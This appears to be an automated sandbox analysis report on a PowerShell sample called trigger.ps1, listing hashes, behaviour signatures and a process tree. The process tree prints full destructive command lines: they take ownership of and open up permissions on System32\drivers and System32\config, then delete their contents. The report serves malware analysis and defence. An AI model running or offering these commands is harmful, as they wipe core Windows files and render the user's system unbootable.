Analysis
-
max time kernel
141s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-08-2024 20:52
Static task
static1
Behavioral task
behavioral1
Sample
trigger.ps1
Resource
win7-20240708-en
6 signatures
150 seconds
General
-
Target
trigger.ps1
-
Size
361B
-
MD5
f027721d34b4dd5220b236a39b0f75a8
-
SHA1
b31847f44624ca0c7a53cd9a01f187bad6c4e88c
-
SHA256
c0979852c32530744818450613b30e9bb81ee684239d189034ed3cee80fb5ae6
-
SHA512
74d9aaf78e525a90cff77a32aed86a4fa594be69bec74ea354f1b471818fbef42616ee5b9cbdea0faaafe2d2d7d5f6a9b4b97be0dc91e528837fa3f8ac281b48
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2796 takeown.exe 5052 icacls.exe 3468 takeown.exe 1220 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2796 takeown.exe 5052 icacls.exe 3468 takeown.exe 1220 icacls.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2240 powershell.exe 2240 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exetakeown.exedescription pid process Token: SeDebugPrivilege 2240 powershell.exe Token: SeTakeOwnershipPrivilege 2796 takeown.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
powershell.execmd.execmd.exedescription pid process target process PID 2240 wrote to memory of 2468 2240 powershell.exe cmd.exe PID 2240 wrote to memory of 2468 2240 powershell.exe cmd.exe PID 2468 wrote to memory of 2796 2468 cmd.exe takeown.exe PID 2468 wrote to memory of 2796 2468 cmd.exe takeown.exe PID 2468 wrote to memory of 5052 2468 cmd.exe icacls.exe PID 2468 wrote to memory of 5052 2468 cmd.exe icacls.exe PID 2240 wrote to memory of 1384 2240 powershell.exe cmd.exe PID 2240 wrote to memory of 1384 2240 powershell.exe cmd.exe PID 1384 wrote to memory of 3468 1384 cmd.exe takeown.exe PID 1384 wrote to memory of 3468 1384 cmd.exe takeown.exe PID 1384 wrote to memory of 1220 1384 cmd.exe icacls.exe PID 1384 wrote to memory of 1220 1384 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5052
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\config\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3468
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\config\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1220
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82